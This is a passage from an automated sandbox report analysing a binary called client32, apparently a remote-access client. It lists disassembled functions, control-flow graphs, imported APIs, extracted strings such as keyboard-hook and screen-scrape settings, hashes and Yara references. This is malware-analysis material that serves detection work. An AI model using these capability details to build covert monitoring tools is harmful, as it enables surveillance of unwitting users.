1726->1670
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,59FD48C0,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                                                                                                • _free.LIBCMT ref: 110A9D60
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                                                                                                • _malloc.LIBCMT ref: 110A9DB3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110A9E21
                                                                                                                                                                • _free.LIBCMT ref: 110A9E33
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                                                                                                • _free.LIBCMT ref: 110A9E64
                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                                                                                • API String ID: 3464732724-3340099623
                                                                                                                                                                • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                                                                                • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                                                                                                • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                                                                                • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50
                                                                                                                                                                Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1923 1102dbc9 1924 1102dbd0-1102dbe1 1923->1924 1924->1924 1925 1102dbe3 1924->1925 1926 1102dd24-1102dd3d call 11142ac0 1925->1926 1929 1102dd43-1102dd45 1926->1929 1930 1102dbc0-1102dbc3 1926->1930 1933 1102de43-1102de5d call 111463d0 1929->1933 1934 1102dd4b-1102dd51 1929->1934 1931 1102dbc5-1102dbc7 1930->1931 1932 1102dbe8-1102dbf1 1930->1932 1931->1924 1932->1926 1935 1102dbf7-1102dbfe 1932->1935 1955 1102deb3-1102debf call 1102b4f0 1933->1955 1956 1102de5f-1102de78 call 1105dd10 1933->1956 1937 1102dd53-1102dd62 call 11144dc0 1934->1937 1938 1102dd68-1102dd78 1934->1938 1935->1926 1939 1102dcf3-1102dd08 call 11162de7 1935->1939 1940 1102dc05-1102dc07 1935->1940 1941 1102dd0a-1102dd1f call 11162de7 1935->1941 1942 1102dc9a-1102dccd call 111618c1 call 11142290 1935->1942 1943 1102dcdb-1102dcf1 call 11164010 1935->1943 1944 1102dc8b-1102dc95 1935->1944 1945 1102dccf-1102dcd9 1935->1945 1946 1102dc4c-1102dc52 1935->1946 1947 1102dc7c-1102dc86 1935->1947 1937->1938 1950 1102dd7a 1938->1950 1951 1102dd7f-1102dd9d call 1102cc10 1938->1951 1939->1926 1940->1926 1954 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1940->1954 1941->1926 1942->1926 1943->1926 1944->1926 1945->1926 1958 1102dc54-1102dc68 call 11162de7 1946->1958 1959 1102dc6d-1102dc77 1946->1959 1947->1926 1950->1951 1951->1933 1975 1102dda3-1102ddc8 call 110b7920 call 11146450 1951->1975 1954->1926 1979 1102dec1-1102dec8 1955->1979 1980 1102de98-1102de9f 1955->1980 1956->1955 1983 1102de7a-1102de8c 1956->1983 1958->1926 1959->1926 2007 1102ddd3-1102ddd9 1975->2007 2008 1102ddca-1102ddd1 1975->2008 1985 1102dea5-1102dea8 1979->1985 1988 1102deca-1102ded4 1979->1988 1980->1985 1986 1102e0aa-1102e0cb GetComputerNameA 1980->1986 1983->1955 2000 1102de8e 1983->2000 1989 1102deaa-1102deb1 call 110b7920 1985->1989 1990 1102ded9 1985->1990 1995 1102e103-1102e109 1986->1995 1996 1102e0cd-1102e101 call 11027c30 1986->1996 1988->1986 2003 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1989->2003 1990->2003 1997 1102e10b-1102e110 1995->1997 1998 1102e13f-1102e152 call 11164010 1995->1998 1996->1995 2025 1102e157-1102e163 1996->2025 2006 1102e116-1102e11a 1997->2006 2024 1102e347-1102e36a 1998->2024 2000->1980 2057 1102e07a-1102e082 SetLastError 2003->2057 2058 1102dfbc-1102dfd3 2003->2058 2012 1102e136-1102e138 2006->2012 2013 1102e11c-1102e11e 2006->2013 2015 1102dddb-1102dde2 call 11027d60 2007->2015 2016 1102de39 2007->2016 2008->1933 2022 1102e13b-1102e13d 2012->2022 2019 1102e132-1102e134 2013->2019 2020 1102e120-1102e126 2013->2020 2015->2016 2033 1102dde4-1102de16 2015->2033 2016->1933 2019->2022 2020->2012 2026 1102e128-1102e130 2020->2026 2022->1998 2022->2025 2035 1102e392-1102e39a 2024->2035 2036 1102e36c-1102e372 2024->2036 2029 1102e165-1102e17a call 110b7920 call 11029bd0 2025->2029 2030 1102e17c-1102e18f call 11081a70 2025->2030 2026->2006 2026->2019 2067 1102e1d3-1102e1ec call 11081a70 2029->2067 2050 1102e191-1102e1b4 2030->2050 2051 1102e1b6-1102e1b8 2030->2051 2052 1102de20-1102de2f call 110f6080 2033->2052 2053 1102de18-1102de1e 2033->2053 2044 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2035->2044 2045 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2035->2045 2036->2035 2042 1102e374-1102e38d call 1102d330 2036->2042 2042->2035 2045->2044 2050->2067 2062 1102e1c0-1102e1d1 2051->2062 2054 1102de32-1102de34 call 1102d330 2052->2054 2053->2052 2053->2054 2054->2016 2069 1102e043-1102e04f 2057->2069 2058->2069 2077 1102dfd5-1102dfde 2058->2077 2062->2062 2062->2067 2083 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2067->2083 2084 1102e32c-1102e339 call 11164010 2067->2084 2071 1102e092-1102e0a1 2069->2071 2072 1102e051-1102e05d 2069->2072 2071->1986 2081 1102e0a3-1102e0a4 FreeLibrary 2071->2081 2078 1102e06f-1102e073 2072->2078 2079 1102e05f-1102e06d GetProcAddress 2072->2079 2077->2069 2087 1102dfe0-1102e016 call 11146450 call 1112b270 2077->2087 2085 1102e084-1102e086 SetLastError 2078->2085 2086 1102e075-1102e078 2078->2086 2079->2078 2081->1986 2123 1102e283-1102e299 call 11128ec0 2083->2123 2124 1102e26f-1102e27e call 11029450 2083->2124 2100 1102e33c-1102e341 CharUpperA 2084->2100 2092 1102e08c 2085->2092 2086->2092 2087->2069 2107 1102e018-1102e03e call 11146450 call 11027920 2087->2107 2092->2071 2100->2024 2107->2069 2128 1102e2b2-1102e2ec call 110d0bd0 * 2 2123->2128 2129 1102e29b-1102e2ad call 110d0bd0 2123->2129 2124->2123 2136 1102e302-1102e32a call 11164010 call 110d07c0 2128->2136 2137 1102e2ee-1102e2fd call 11029450 2128->2137 2129->2128 2136->2100 2137->2136
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: $14/03/16 10:38:31 V12.10F8$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                • API String ID: 1029625771-730963012
                                                                                                                                                                • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                                                                                • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                                                                                                • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                                                                                                • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
                                                                                                                                                                Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2143 111414a0-111414e1 call 11146450 2146 111414e7-11141543 LoadLibraryA 2143->2146 2147 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2143->2147 2149 11141545-11141550 call 11017450 2146->2149 2150 11141557-11141560 2146->2150 2158 11141595-1114159b 2147->2158 2159 111415c3 2147->2159 2149->2150 2157 11141552 call 110cc7f0 2149->2157 2150->2147 2153 11141562-11141563 FreeLibrary 2150->2153 2153->2147 2157->2150 2158->2159 2161 1114159d-111415a3 2158->2161 2162 111415cd-111415ed GetClassInfoExA 2159->2162 2161->2159 2163 111415a5-111415c1 call 1105dd10 2161->2163 2164 111415f3-1114161a call 11161d20 call 111444b0 2162->2164 2165 1114168e-111416e6 2162->2165 2163->2162 2174 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2164->2174 2175 1114161c-11141630 call 11029450 2164->2175 2176 11141722-11141728 2165->2176 2177 111416e8-111416ee 2165->2177 2174->2165 2201 11141677-1114168b call 11029450 2174->2201 2175->2174 2181 11141764-11141786 call 1105dd10 2176->2181 2182 1114172a-11141739 call 1110f420 2176->2182 2177->2176 2179 111416f0-111416f6 2177->2179 2179->2176 2184 111416f8-1114170f call 1112c830 LoadLibraryA 2179->2184 2192 11141794-11141799 2181->2192 2193 11141788-11141792 2181->2193 2196 1114175d 2182->2196 2197 1114173b-1114175b 2182->2197 2184->2176 2200 11141711-1114171d GetProcAddress 2184->2200 2198 111417a5-111417ab 2192->2198 2199 1114179b 2192->2199 2193->2198 2202 1114175f 2196->2202 2197->2202 2203 111417ad-111417b3 call 110f7d00 2198->2203 2204 111417b8-111417d1 call 1113cd80 2198->2204 2199->2198 2200->2176 2201->2165 2202->2181 2203->2204 2211 111417d7-111417dd 2204->2211 2212 11141879-1114188a 2204->2212 2213 111417df-111417f1 call 1110f420 2211->2213 2214 11141819-1114181f 2211->2214 2225 111417f3-11141809 call 1115d6d0 2213->2225 2226 1114180b 2213->2226 2215 11141845-11141851 2214->2215 2216 11141821-11141827 2214->2216 2220 11141853-11141859 2215->2220 2221 11141868-11141873 #17 LoadLibraryA 2215->2221 2218 1114182e-11141840 SetTimer 2216->2218 2219 11141829 call 11134930 2216->2219 2218->2215 2219->2218 2220->2221 2224 1114185b-11141861 2220->2224 2221->2212 2224->2221 2229 11141863 call 1112d6a0 2224->2229 2228 1114180d-11141814 2225->2228 2226->2228 2228->2214 2229->2221
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                                                                                                • _memset.LIBCMT ref: 111415F9
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                                                                                                • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                                                                                                  • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,59FD48C0,1102FCB2,00000000), ref: 1101747E
                                                                                                                                                                  • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                                                                                  • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                                                                                  • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                                                                                  • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                                                                                                  • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                                • API String ID: 3706574701-3145203681
                                                                                                                                                                • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                                                                                • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                                                                                                • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                                                                                                • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55
                                                                                                                                                                Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2232 110285f0-1102860d 2233 11028613-11028642 2232->2233 2234 11028cd8-11028cdf 2232->2234 2237 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2233->2237 2238 11028648-1102864e 2233->2238 2235 11028cf1-11028cf5 2234->2235 2236 11028ce1-11028cea 2234->2236 2241 11028cf7-11028d09 call 11161d01 2235->2241 2242 11028d0a-11028d1e call 11161d01 2235->2242 2236->2235 2240 11028cec 2236->2240 2252 1102871d 2237->2252 2239 11028650-11028658 2238->2239 2239->2239 2244 1102865a-11028660 2239->2244 2240->2235 2248 11028663-11028668 2244->2248 2248->2248 2253 1102866a-11028674 2248->2253 2254 11028720-1102872a 2252->2254 2255 11028691-11028697 2253->2255 2256 11028676-1102867d 2253->2256 2257 11028730-11028733 2254->2257 2258 11028ccf-11028cd7 2254->2258 2260 11028698-1102869e 2255->2260 2259 11028680-11028686 2256->2259 2257->2258 2261 11028739-11028747 call 11026890 2257->2261 2258->2234 2259->2259 2262 11028688-1102868e 2259->2262 2260->2260 2263 110286a0-110286ce call 11163fed 2260->2263 2268 11028c55-11028c6a call 11163db7 2261->2268 2269 1102874d-11028760 call 11162de7 2261->2269 2262->2255 2263->2254 2268->2258 2276 11028c70-11028cca 2268->2276 2274 11028762-11028765 2269->2274 2275 1102876b-11028793 call 11026700 call 11026890 2269->2275 2274->2268 2274->2275 2275->2268 2281 11028799-110287b6 call 11026980 call 11026890 2275->2281 2276->2258 2286 11028bc5-11028bcc 2281->2286 2287 110287bc 2281->2287 2288 11028bf2-11028bf9 2286->2288 2289 11028bce-11028bd1 2286->2289 2290 110287c0-110287e0 call 11026700 2287->2290 2292 11028c11-11028c18 2288->2292 2293 11028bfb-11028c01 2288->2293 2289->2288 2291 11028bd3-11028bda 2289->2291 2300 110287e2-110287e5 2290->2300 2301 11028816-11028819 2290->2301 2295 11028be0-11028bf0 2291->2295 2297 11028c1a-11028c25 2292->2297 2298 11028c28-11028c2f 2292->2298 2296 11028c07-11028c0f 2293->2296 2295->2288 2295->2295 2296->2292 2296->2296 2297->2298 2302 11028c31-11028c3b 2298->2302 2303 11028c3e-11028c45 2298->2303 2304 110287e7-110287ee 2300->2304 2305 110287fe-11028801 2300->2305 2307 11028bae-11028bbf call 11026890 2301->2307 2308 1102881f-11028832 call 11164150 2301->2308 2302->2303 2303->2268 2306 11028c47-11028c52 2303->2306 2309 110287f4-110287fc 2304->2309 2305->2307 2310 11028807-11028811 2305->2310 2306->2268 2307->2286 2307->2290 2308->2307 2315 11028838-11028854 call 111646ce 2308->2315 2309->2305 2309->2309 2310->2307 2318 11028856-1102885c 2315->2318 2319 1102886f-11028885 call 111646ce 2315->2319 2320 11028860-11028868 2318->2320 2324 11028887-1102888d 2319->2324 2325 1102889f-110288b5 call 111646ce 2319->2325 2320->2320 2322 1102886a 2320->2322 2322->2307 2326 11028890-11028898 2324->2326 2330 110288b7-110288bd 2325->2330 2331 110288cf-110288e5 call 111646ce 2325->2331 2326->2326 2328 1102889a 2326->2328 2328->2307 2332 110288c0-110288c8 2330->2332 2336 110288e7-110288ed 2331->2336 2337 110288ff-11028915 call 111646ce 2331->2337 2332->2332 2334 110288ca 2332->2334 2334->2307 2338 110288f0-110288f8 2336->2338 2342 11028917-1102891d 2337->2342 2343 1102892f-11028945 call 111646ce 2337->2343 2338->2338 2340 110288fa 2338->2340 2340->2307 2345 11028920-11028928 2342->2345 2348 11028947-1102894d 2343->2348 2349 1102895f-11028975 call 111646ce 2343->2349 2345->2345 2347 1102892a 2345->2347 2347->2307 2350 11028950-11028958 2348->2350 2354 11028977-1102897d 2349->2354 2355 1102898f-110289a5 call 111646ce 2349->2355 2350->2350 2352 1102895a 2350->2352 2352->2307 2356 11028980-11028988 2354->2356 2360 110289a7-110289ad 2355->2360 2361 110289bf-110289d5 call 111646ce 2355->2361 2356->2356 2358 1102898a 2356->2358 2358->2307 2363 110289b0-110289b8 2360->2363 2366 110289d7-110289dd 2361->2366 2367 110289ef-11028a05 call 111646ce 2361->2367 2363->2363 2364 110289ba 2363->2364 2364->2307 2368 110289e0-110289e8 2366->2368 2372 11028a07-11028a0d 2367->2372 2373 11028a1f-11028a35 call 111646ce 2367->2373 2368->2368 2370 110289ea 2368->2370 2370->2307 2374 11028a10-11028a18 2372->2374 2378 11028a37-11028a3d 2373->2378 2379 11028a4f-11028a65 call 111646ce 2373->2379 2374->2374 2376 11028a1a 2374->2376 2376->2307 2380 11028a40-11028a48 2378->2380 2384 11028a86-11028a9c call 111646ce 2379->2384 2385 11028a67-11028a6d 2379->2385 2380->2380 2382 11028a4a 2380->2382 2382->2307 2390 11028ab3-11028ac9 call 111646ce 2384->2390 2391 11028a9e 2384->2391 2386 11028a77-11028a7f 2385->2386 2386->2386 2388 11028a81 2386->2388 2388->2307 2396 11028ae0-11028af6 call 111646ce 2390->2396 2397 11028acb 2390->2397 2393 11028aa4-11028aac 2391->2393 2393->2393 2395 11028aae 2393->2395 2395->2307 2402 11028b17-11028b2d call 111646ce 2396->2402 2403 11028af8-11028afe 2396->2403 2398 11028ad1-11028ad9 2397->2398 2398->2398 2400 11028adb 2398->2400 2400->2307 2408 11028b4f-11028b65 call 111646ce 2402->2408 2409 11028b2f-11028b3f 2402->2409 2404 11028b08-11028b10 2403->2404 2404->2404 2406 11028b12 2404->2406 2406->2307 2414 11028b67-11028b6d 2408->2414 2415 11028b7c-11028b92 call 111646ce 2408->2415 2411 11028b40-11028b48 2409->2411 2411->2411 2412 11028b4a 2411->2412 2412->2307 2416 11028b70-11028b78 2414->2416 2415->2307 2420 11028b94-11028b9a 2415->2420 2416->2416 2418 11028b7a 2416->2418 2418->2307 2421 11028ba4-11028bac 2420->2421 2421->2307 2421->2421
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73D41370,?,0000001A), ref: 110286DD
                                                                                                                                                                • _strrchr.LIBCMT ref: 110286EC
                                                                                                                                                                  • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
